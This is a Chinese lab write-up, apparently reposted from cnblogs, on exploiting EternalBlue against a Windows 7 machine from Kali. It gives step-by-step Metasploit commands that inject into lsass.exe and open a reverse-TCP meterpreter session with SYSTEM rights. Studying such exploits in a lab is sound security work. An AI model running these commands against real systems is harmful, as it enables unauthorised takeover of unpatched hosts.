起因

最近在学习内网渗透,考虑到永恒家族的重要性,记录一下永恒之蓝的利用过程,一般用在win server 2008和win7上。
我们以win7 64位为例子

exploit github地址

目标机器:windows 7 sp1 64位
攻击机器:kali 64位

首先我们安装wine32组件。

dpkg --add-architecture i386
apt-get install wine32
wine cmd.exe
exit

安装完成之后我们把代码git下来

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git,啊哈,原先以为kali没有装,所以就是直接复制进去的,导致了后面ps中发生的错误
我们进入Eternalblue-Doublepulsar-Metasploit目录,并把模块复制到msf对应的目录中
cd Eternalblue-Doublepulsar-Metasploit
cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/

ps:这边有一个坑,就是我们用cp这个命令的话只是把这个 eternalblue_doublepulsar.rb复制到*/smb/目录下,但是并没有复制deps目录和其中的文件
我们可以查看一下eternalblue_doublepulsar.rb里面的内容,发现在这边有个目录/root/Eternalblue-Doublepulsar-Metasploit-master/deps/,是关于deps的
,我们这是从github下载的,原先就是已经下载好了的,就是说你要把deps这个目录放在/root/Eternalblue-Doublepulsar-Metasploit-master/下,不然的话会报错。所以这个俩个位置一定要注意看
1121221-20180216230506999-39512045.png

我们开启msf

msfconsole

use exploit/windows/smb/eternalblue_doublepulsar

我们设置必要的参数和payload,该模块需要配置的参数较多。

set PROCESSINJECT lsass.exe   #设置注入进程的名称,64位的操作系统位lsass.exe
set RHOST 192.168.142.128     #设置目标机器的IP
set TARGETARCHITECTURE x64    #设置目标机器的系统架构
set target 8                  #设置目标机器的系统类型,可以使用show targets命令查看支持的操作系统
set payload windows/x64/meterpreter/reverse_tcp  #设置payload为反向连接的载荷
set LHOST 192.168.142.133     #设置反向连接的IP为本机。
exploit                       #执行

这是大佬设置参数,给大家参考一下,懒就不想再做实验了
1121221-20180216231231406-1495394035.png

执行exploit命令之后,获取到目标机器的会话,权限为system
1121221-20180216231251827-117160566.png

参考链接

转载于:https://www.cnblogs.com/dycsy/p/8450424.html

Logo

开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!

更多推荐